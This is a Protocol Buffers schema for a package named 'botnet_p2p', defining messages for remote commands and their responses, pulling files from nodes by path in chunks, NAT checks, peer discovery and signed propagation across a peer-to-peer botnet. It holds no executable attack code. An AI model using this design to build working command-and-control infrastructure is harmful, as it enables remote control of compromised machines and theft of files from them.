Message.proto

syntax = "proto3";
package botnet_p2p;

message Message {
    enum MessageType {
        UNDEFINED = 0;
        COMMAND = 1;
        COMMAND_RESPONSE = 2;
        FILE_REQUEST = 3;
        FILE_CHUNK = 4;
        NAT_REQUEST = 5;
        NAT_CHECK = 6;
        PING = 7;
        PING_RESPONSE = 8;
        LEAVE = 9;
        FIND_NODE = 10;
        FOUND_NODES = 11;
    }

    enum Status {
        FAIL = 0;
        OK = 1;
    }

    message Contact {
        string guid = 1;
        string IP = 2;
        uint32 port = 3;
        bool isNAT = 4;
    }

    message CommandMsg {
        string command = 1;
        bool shouldRespond = 2;
    }

    message CommandResponseMsg {
        string value = 1;
        Status status = 2;
    }

    message FileRequestMsg {
        string path = 1;
    }
    
    message FileChunkMsg {
        string uuid = 1;
        string fileName = 2;
        uint32 fileSize = 3;
        uint32 ordinal = 4;
        bytes data = 5;
    }

    message NATRequestMsg {
        string guid = 1;
    }

    message NATCheckMsg {
        string guid = 1;
    }
    
    message FindNodeMsg {
        string guid = 1;
    }

    message FoundNodesMsg {
        repeated Contact nodes = 1;
    }
    
    string uuid = 1;
    MessageType type = 2;
    Contact sender = 3;
    Contact receiver = 4;
    bool propagation = 5;
    bytes signature = 6;
    oneof payload {
        CommandMsg command = 7;
        CommandResponseMsg response = 8;
        FileRequestMsg fileRequest = 9;
        FileChunkMsg fileChunk = 10;
        NATRequestMsg NATRequest = 11;
        NATCheckMsg NATCheck = 12;
        FindNodeMsg findNode = 13;
        FoundNodesMsg foundNodes = 14;          
    }
}